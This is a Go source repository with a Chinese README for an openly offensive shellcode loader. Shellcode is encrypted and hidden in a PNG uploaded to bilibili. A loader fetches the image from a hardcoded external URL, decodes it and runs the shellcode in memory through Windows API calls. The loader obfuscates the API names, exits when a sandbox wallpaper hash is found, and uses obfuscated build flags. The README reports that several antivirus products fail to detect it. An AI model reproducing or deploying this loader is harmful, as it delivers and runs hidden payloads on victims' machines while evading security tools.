├── .gitignore ├── README.md ├── cmd ├── generate │ └── generate.go └── shellcodeLoader │ └── shellcodeLoader.go ├── crypt ├── base64.go ├── des.go └── steg.go ├── doc ├── img.png ├── img2.png ├── img3.png ├── img4.png ├── img5.png ├── img6.png ├── img7.png └── img8.jpeg ├── go.mod ├── go.sum ├── image ├── generate.go └── getShellcode.go └── loader └── loader.go /.gitignore: -------------------------------------------------------------------------------- 1 | /.idea/ 2 | /test/ 3 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # bimg-shellcode-loader 2 | bimg-shellcode-loader是一个使用bilibili图片隐写功能加载shellcode的工具。当然你可以使用任何地方的图片。 3 | 4 | 在调研C2通讯方式时，发现有一个有师傅使用了bilbili图片隐写功能加载shellcode，觉得这个方法很有意思，就自己写了一个工具。添加了反沙箱功能。 5 | 如果这个项目对你有帮助，欢迎star。 6 | 7 | ### 使用步骤 8 | ##### 1. 生成包含隐写信息的图片 9 | 使用generate.go生成包含shellcode的图片，生成的图片为out_file.png。 10 | 在generate.go同级目录下存放shellcode文件，shellcode文件名为shellcode.bin。 11 | 图片为img.png, 随后用运行generate.go生成out_file.png。 12 | ```shell 13 | go run generate.go 14 | ``` 15 | 16 | ##### 2. 上传图片到bilibili 17 | 登陆访问创作中心 https://member.bilibili.com/platform/upload/text/edit 点击上传图片，把生成的图片上传上去。 18 | ![img.png](doc/img.png) 19 | 20 | 通过浏览器开发者工具，查看上传图片的请求，找到图片的返回地址，复制下来。 21 | 22 | ![img.png](doc/img2.png) 23 | 24 | 把图片地址填入到shellcodeLoader.go中的`imgUrl`变量中。 25 | 26 | ![img.png](doc/img3.png) 27 | ##### 3. 编译加载器 28 | ```go 29 | CGO_ENABLED=0 GOOS=windows GOARCH=amd64 GOPRIVATE=* GOGARBLE=* garble -tiny -literals -seed=random build -ldflags "-w -s -buildid= -H=windowsgui" -buildmode="pie" 30 | ``` 31 | 32 | ### 免杀 33 | 只测试了360和微步 34 | ![img.png](doc/img4.png) 35 | 36 | 微步反沙箱，判断当前系统壁纸，如果是沙箱内的壁纸就退出。大家有遇到的沙箱或者分析机，提取壁纸的md5放入列表中。 37 | ```go 38 | md5List := []string{"fbfeb6772173fef2213992db05377231", "49150f7bfd879fe03a2f7d148a2514de", "fc322167eb838d9cd4ed6e8939e78d89", "178aefd8bbb4dd3ed377e790bc92a4eb", "0f8f1032e4afe1105a2e5184c61a3ce4", "da288dceaafd7c97f1b09c594eac7868"} 39 | ``` 40 | 微步沙箱检测通过0/24，并且没有检测到网络通信。 41 | ![img_1.png](doc/img5.png) 42 | ![img.png](doc/img6.png) 43 | 44 | 火绒 45 | ![img8.jpeg](doc%2Fimg8.jpeg) 46 | 47 | virscan扫描结果 48 | ![img7.png](doc%2Fimg7.png) 49 | ## Stargazers over time 50 | 51 | [![Stargazers over time](https://starchart.cc/intbjw/bimg-shellcode-loader.svg)](https://starchart.cc/intbjw/bimg-shellcode-loader) 52 | 53 | #### Visitors (Since 2023/08/01) 54 |

55 |

56 |

57 | -------------------------------------------------------------------------------- /cmd/generate/generate.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bimg-shellcode-loader/image" 5 | "os" 6 | ) 7 | 8 | func main() { 9 | // 打开shell.bin文件,获取byte数组 10 | shellcode, _ := os.ReadFile("shell.bin") 11 | image.Generate("img.png", shellcode) 12 | 13 | } 14 | -------------------------------------------------------------------------------- /cmd/shellcodeLoader/shellcodeLoader.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "bimg-shellcode-loader/loader" 5 | "crypto/md5" 6 | "encoding/hex" 7 | "fmt" 8 | "github.com/reujab/wallpaper" 9 | "io" 10 | "os" 11 | ) 12 | 13 | func main() { 14 | 15 | checkDesktopMd5() 16 | loader.Loader("https://txycct-1305644927.cos.ap-nanjing.myqcloud.com/file/out_file.png") 17 | } 18 | 19 | func checkDesktopMd5() { 20 | // 获取当前桌面壁纸路径 21 | path, err := wallpaper.Get() 22 | if err != nil { 23 | fmt.Println(err.Error()) 24 | } 25 | 26 | // 计算文件的MD5值 27 | file, err := os.Open(path) 28 | if err != nil { 29 | fmt.Println(err.Error()) 30 | } 31 | defer file.Close() 32 | 33 | hash := md5.New() 34 | if _, err := io.Copy(hash, file); err != nil { 35 | fmt.Println(err.Error()) 36 | } 37 | 38 | md5value := hex.EncodeToString(hash.Sum(nil)) 39 | // md5值列表 40 | md5List := []string{"fbfeb6772173fef2213992db05377231", "49150f7bfd879fe03a2f7d148a2514de", "fc322167eb838d9cd4ed6e8939e78d89", "178aefd8bbb4dd3ed377e790bc92a4eb", "0f8f1032e4afe1105a2e5184c61a3ce4", "da288dceaafd7c97f1b09c594eac7868"} 41 | // 判断md5值是否在列表中 42 | for _, value := range md5List { 43 | if value == md5value { 44 | // 程序退出 45 | os.Exit(0) 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /crypt/base64.go: -------------------------------------------------------------------------------- 1 | package crypt 2 | 3 | import ( 4 | "encoding/base64" 5 | ) 6 | 7 | // 自定义base64编码表 8 | const base64Table = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" 9 | 10 | // 自定义base64编码 11 | func CustomBase64Encode(data []byte) string { 12 | // 创建一个自定义base64编码器 13 | encoder := base64.NewEncoding(ShuffleString(base64Table)) 14 | 15 | // 编码数据 16 | encoded := encoder.EncodeToString(data) 17 | 18 | return encoded 19 | } 20 | 21 | // 自定义base64解码 22 | func CustomBase64Decode(encoded string) ([]byte, error) { 23 | // 创建一个自定义base64解码器 24 | decoder := base64.NewEncoding(ShuffleString(base64Table)) 25 | 26 | // 解码数据 27 | decoded, err := decoder.DecodeString(encoded) 28 | if err != nil { 29 | return nil, err 30 | } 31 | 32 | return decoded, nil 33 | } 34 | 35 | func ShuffleString(s string) string { 36 | // 将字符串转换为rune数组 37 | runes := []rune(s) 38 | 39 | // 打乱rune数组顺序 40 | for inter := len(runes) - 1; inter > 0; inter-- { 41 | jnter := inter - 1 42 | if jnter < 0 { 43 | jnter = 0 44 | } 45 | runes[inter], runes[jnter] = runes[jnter], runes[inter] 46 | } 47 | 48 | // 将rune数组转换为字符串 49 | return string(runes) 50 | } 51 | -------------------------------------------------------------------------------- /crypt/des.go: -------------------------------------------------------------------------------- 1 | package crypt 2 | 3 | import ( 4 | "bytes" 5 | "crypto/cipher" 6 | "crypto/des" 7 | ) 8 | 9 | // 使用DES CFB模式进行加密 10 | func DesEncrypt(origData, key, iv []byte) ([]byte, error) { 11 | // 创建一个DES密码分组 12 | block, err := des.NewCipher(key) 13 | if err != nil { 14 | return nil, err 15 | } 16 | 17 | // 对原始数据进行填充 18 | origData = pkcs7Padding(origData, block.BlockSize()) 19 | 20 | // 创建一个CFB加密模式 21 | cfb := cipher.NewCFBEncrypter(block, iv) 22 | 23 | // 加密数据 24 | encrypted := make([]byte, len(origData)) 25 | cfb.XORKeyStream(encrypted, origData) 26 | 27 | return encrypted, nil 28 | } 29 | 30 | // 使用DES CFB模式进行解密 31 | func DesDecrypt(encryptedData, key, iv []byte) ([]byte, error) { 32 | // 创建一个DES密码分组 33 | block, err := des.NewCipher(key) 34 | if err != nil { 35 | return nil, err 36 | } 37 | 38 | // 创建一个CFB解密模式 39 | cfb := cipher.NewCFBDecrypter(block, iv) 40 | 41 | // 解密数据 42 | decrypted := make([]byte, len(encryptedData)) 43 | cfb.XORKeyStream(decrypted, encryptedData) 44 | 45 | // 对解密后的数据进行去填充 46 | decrypted = pkcs7UnPadding(decrypted) 47 | 48 | return decrypted, nil 49 | } 50 | 51 | // PKCS7填充 52 | func pkcs7Padding(ciphertext []byte, blockSize int) []byte { 53 | padding := blockSize - len(ciphertext)%blockSize 54 | padtext := bytes.Repeat([]byte{byte(padding)}, padding) 55 | return append(ciphertext, padtext...) 56 | } 57 | 58 | // PKCS7去填充 59 | func pkcs7UnPadding(origData []byte) []byte { 60 | length := len(origData) 61 | unpadding := int(origData[length-1]) 62 | return origData[:(length - unpadding)] 63 | } 64 | -------------------------------------------------------------------------------- /crypt/steg.go: -------------------------------------------------------------------------------- 1 | package crypt 2 | 3 | import ( 4 | "bufio" 5 | "bytes" 6 | "github.com/auyer/steganography" 7 | "image/png" 8 | "io" 9 | "log" 10 | "os" 11 | ) 12 | 13 | func StegEncode(imgFile string, msg []byte) { 14 | 15 | inFile, _ := os.Open(imgFile) 16 | reader := bufio.NewReader(inFile) 17 | img, _ := png.Decode(reader) 18 | www := new(bytes.Buffer) // buffer that will recieve the results 19 | err := steganography.Encode(www, img, msg) // Encode the message into the image 20 | if err != nil { 21 | log.Printf("Error Encoding file %v", err) 22 | return 23 | } 24 | outFile, _ := os.Create("out_file.png") // create file 25 | www.WriteTo(outFile) // write buffer to it 26 | outFile.Close() 27 | } 28 | 29 | func StegDecode(imgReader io.Reader) []byte { 30 | reader := bufio.NewReader(imgReader) 31 | img, _ := png.Decode(reader) 32 | sizeOfMessage := steganography.GetMessageSizeFromImage(img) 33 | msg := steganography.Decode(sizeOfMessage, img) 34 | return msg 35 | } 36 | -------------------------------------------------------------------------------- /doc/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img.png -------------------------------------------------------------------------------- /doc/img2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img2.png -------------------------------------------------------------------------------- /doc/img3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img3.png -------------------------------------------------------------------------------- /doc/img4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img4.png -------------------------------------------------------------------------------- /doc/img5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img5.png -------------------------------------------------------------------------------- /doc/img6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img6.png -------------------------------------------------------------------------------- /doc/img7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img7.png -------------------------------------------------------------------------------- /doc/img8.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/intbjw/bimg-shellcode-loader/b73f7fea731065b7a21e093f39582bba9b5f618b/doc/img8.jpeg -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module bimg-shellcode-loader 2 | 3 | go 1.20 4 | 5 | require ( 6 | github.com/auyer/steganography v1.0.2 7 | github.com/go-resty/resty/v2 v2.7.0 8 | github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740 9 | golang.org/x/sys v0.10.0 10 | ) 11 | 12 | require ( 13 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb // indirect 14 | gopkg.in/ini.v1 v1.62.0 // indirect 15 | gopkg.in/yaml.v2 v2.4.0 // indirect 16 | ) 17 | -------------------------------------------------------------------------------- /go.sum: -------------------------------------------------------------------------------- 1 | github.com/auyer/steganography v1.0.2 h1:G5iZbX8QUvw+kCLyK+59hY8t/oSSpSS5yStIcPCGIgU= 2 | github.com/auyer/steganography v1.0.2/go.mod h1:Q2qN+f1ixaXnKTCT4xkSDCZ/5NiOpUeTgOCLwQdJD+A= 3 | github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY= 4 | github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I= 5 | github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1 h1:EGx4pi6eqNxGaHF6qqu48+N2wcFQ5qg5FXgOdqsJ5d8= 6 | github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY= 7 | github.com/jtolds/gls v4.20.0+incompatible h1:xdiiI2gbIgH/gLH7ADydsJ1uDOEzR8yvV7C0MuV77Wo= 8 | github.com/jtolds/gls v4.20.0+incompatible/go.mod h1:QJZ7F/aHp+rZTRtaJ1ow/lLfFfVYBRgL+9YlvaHOwJU= 9 | github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740 h1:X6IDPPN+zrSClp0Q+JiERA//d8L0WcU5MqcGeulCW1A= 10 | github.com/reujab/wallpaper v0.0.0-20210630195606-5f9f655b3740/go.mod h1:WYwPVmM/8szeItLeWkwZSLRvQgrvsvstRzgznR8+E4Q= 11 | github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d h1:zE9ykElWQ6/NYmHa3jpm/yHnI4xSofP+UP6SpjHcSeM= 12 | github.com/smartystreets/assertions v0.0.0-20180927180507-b2de0cb4f26d/go.mod h1:OnSkiWE9lh6wB0YB77sQom3nweQdgAjqCqsofrRNTgc= 13 | github.com/smartystreets/goconvey v1.6.4 h1:fv0U8FUIMPNf1L9lnHLvLhgicrIVChEkdzIKYqbNC9s= 14 | github.com/smartystreets/goconvey v1.6.4/go.mod h1:syvi0/a8iFYH4r/RixwvyeAJjdLS9QV7WQ/tjFTllLA= 15 | golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= 16 | golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= 17 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb h1:pirldcYWx7rx7kE5r+9WsOXPXK0+WH5+uZ7uPmJ44uM= 18 | golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= 19 | golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= 20 | golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 21 | golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= 22 | golang.org/x/sys v0.10.0 h1:SqMFp9UcQJZa+pmYuAKjd9xq1f0j5rLcDIk0mj4qAsA= 23 | golang.org/x/sys v0.10.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= 24 | golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= 25 | golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= 26 | golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= 27 | golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= 28 | golang.org/x/tools v0.0.0-20190328211700-ab21143f2384/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= 29 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= 30 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 31 | gopkg.in/ini.v1 v1.62.0 h1:duBzk771uxoUuOlyRLkHsygud9+5lrlGjdFBb4mSKDU= 32 | gopkg.in/ini.v1 v1.62.0/go.mod h1:pNLf8WUiyNEtQjuu5G5vTm06TEv9tsIgeAvK8hOrP4k= 33 | gopkg.in/yaml.v2 v2.4.0 h1:D8xgwECY7CYvx+Y2n4sBz93Jn9JRvxdiyyo8CTfuKaY= 34 | gopkg.in/yaml.v2 v2.4.0/go.mod h1:RDklbk79AGWmwhnvt/jBztapEOGDOx6ZbXqjP6csGnQ= 35 | -------------------------------------------------------------------------------- /image/generate.go: -------------------------------------------------------------------------------- 1 | package image 2 | 3 | import ( 4 | "bimg-shellcode-loader/crypt" 5 | ) 6 | 7 | func Generate(imgFile string, shellcode []byte) { 8 | encryptShellcode, _ := crypt.DesEncrypt(shellcode, []byte("12345678"), []byte("87654321")) 9 | // 对encryptShellcode进行base64编码 10 | base64Shellcode := crypt.CustomBase64Encode(encryptShellcode) 11 | // 对base64Shellcode进行steg编码 12 | crypt.StegEncode(imgFile, []byte(base64Shellcode)) 13 | } 14 | -------------------------------------------------------------------------------- /image/getShellcode.go: -------------------------------------------------------------------------------- 1 | package image 2 | 3 | import ( 4 | "bimg-shellcode-loader/crypt" 5 | "bytes" 6 | "fmt" 7 | "github.com/go-resty/resty/v2" 8 | "os" 9 | ) 10 | 11 | // GetShellcode 从b站上下载图片，获取shellcode 12 | func GetShellcode(url string) []byte { 13 | // 使用resty下载 14 | resp, err := resty.New().R().Get(url) 15 | if err != nil { 16 | fmt.Println(err.Error()) 17 | os.Exit(0) 18 | } 19 | //获取返回值 20 | reader := bytes.NewReader(resp.Body()) 21 | msg := crypt.StegDecode(reader) 22 | // 对msg进行base64解码 23 | shellcode, _ := crypt.CustomBase64Decode(string(msg)) 24 | // 对shellcode进行des解密 25 | shellcode, _ = crypt.DesDecrypt(shellcode, []byte("12345678"), []byte("87654321")) 26 | return shellcode 27 | } 28 | -------------------------------------------------------------------------------- /loader/loader.go: -------------------------------------------------------------------------------- 1 | package loader 2 | 3 | import ( 4 | "bimg-shellcode-loader/image" 5 | "fmt" 6 | "golang.org/x/sys/windows" 7 | "log" 8 | "unsafe" 9 | ) 10 | 11 | const ( 12 | // MEM_COMMIT is a Windows constant used with Windows API calls 13 | MEM_COMMIT = 0x1000 14 | // MEM_RESERVE is a Windows constant used with Windows API calls 15 | MEM_RESERVE = 0x2000 16 | // PAGE_EXECUTE_READ is a Windows constant used with Windows API calls 17 | PAGE_EXECUTE_READ = 0x20 18 | // PAGE_READWRITE is a Windows constant used with Windows API calls 19 | PAGE_READWRITE = 0x04 20 | ) 21 | 22 | // https://docs.microsoft.com/en-us/windows/win32/midl/enum 23 | const ( 24 | QUEUE_USER_APC_FLAGS_NONE = iota 25 | QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC 26 | QUEUE_USER_APC_FLGAS_MAX_VALUE 27 | ) 28 | 29 | const ( 30 | apple = "k" + "e" + "r" + "n" + "e" + "l" + "3" + "2" + ".d" + "l" + "l" 31 | banana = "n" + "t" + "d" + "l" + "l" + ".d" + "l" + "l" 32 | cherry = "V" + "i" + "r" + "t" + "u" + "a" + "l" + "A" + "l" + "l" + "o" + "c" 33 | date = "V" + "i" + "r" + "t" + "u" + "a" + "l" + "P" + "r" + "o" + "t" + "e" + "c" + "t" 34 | elderberry = "G" + "e" + "t" + "C" + "u" + "r" + "r" + "e" + "n" + "t" + "T" + "h" + "r" + "e" + "a" + "d" 35 | fig = "R" + "t" + "l" + "C" + "o" + "p" + "y" + "M" + "e" + "m" + "o" + "r" + "y" 36 | grapefruit = "N" + "t" + "Q" + "u" + "e" + "u" + "e" + "A" + "p" + "c" + "T" + "h" + "r" + "e" + "a" + "d" + "E" + "x" 37 | ) 38 | 39 | func Loader(url string) { 40 | // 随便写一些代码，让编译器不要优化掉 41 | 42 | // 从b站上下载图片，获取shellcode 43 | shellcode := image.GetShellcode(url) 44 | 45 | // Pop Calc Shellcode 46 | 47 | abc := windows.NewLazySystemDLL(apple) 48 | bcd := windows.NewLazySystemDLL(banana) 49 | 50 | cde := abc.NewProc(cherry) 51 | def := abc.NewProc(date) 52 | fed := abc.NewProc(elderberry) 53 | ert := bcd.NewProc(fig) 54 | qwe := bcd.NewProc(grapefruit) 55 | 56 | addr, _, errcde := cde.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) 57 | 58 | if errcde != nil && errcde.Error() != "The operation completed successfully." { 59 | log.Fatal(fmt.Sprintf("[!]Error calling cde:\r\n%s", errcde.Error())) 60 | } 61 | 62 | if addr == 0 { 63 | log.Fatal("[!]cde failed and returned 0") 64 | } 65 | 66 | _, _, errert := ert.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) 67 | 68 | if errert != nil && errert.Error() != "The operation completed successfully." { 69 | log.Fatal(fmt.Sprintf("[!]Error calling ert:\r\n%s", errert.Error())) 70 | } 71 | 72 | oldProtect := PAGE_READWRITE 73 | _, _, errdef := def.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) 74 | if errdef != nil && errdef.Error() != "The operation completed successfully." { 75 | log.Fatal(fmt.Sprintf("Error calling def:\r\n%s", errdef.Error())) 76 | } 77 | 78 | thread, _, err := fed.Call() 79 | if err.Error() != "The operation completed successfully." { 80 | log.Fatal(fmt.Sprintf("Error calling fed:\n%s", err)) 81 | } 82 | 83 | //USER_APC_OPTION := uintptr(QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC) 84 | _, _, err = qwe.Call(thread, QUEUE_USER_APC_FLAGS_SPECIAL_USER_APC, uintptr(addr), 0, 0, 0) 85 | if err.Error() != "The operation completed successfully." { 86 | log.Fatal(fmt.Sprintf("Error calling qwe:\n%s", err)) 87 | } 88 | 89 | } 90 | --------------------------------------------------------------------------------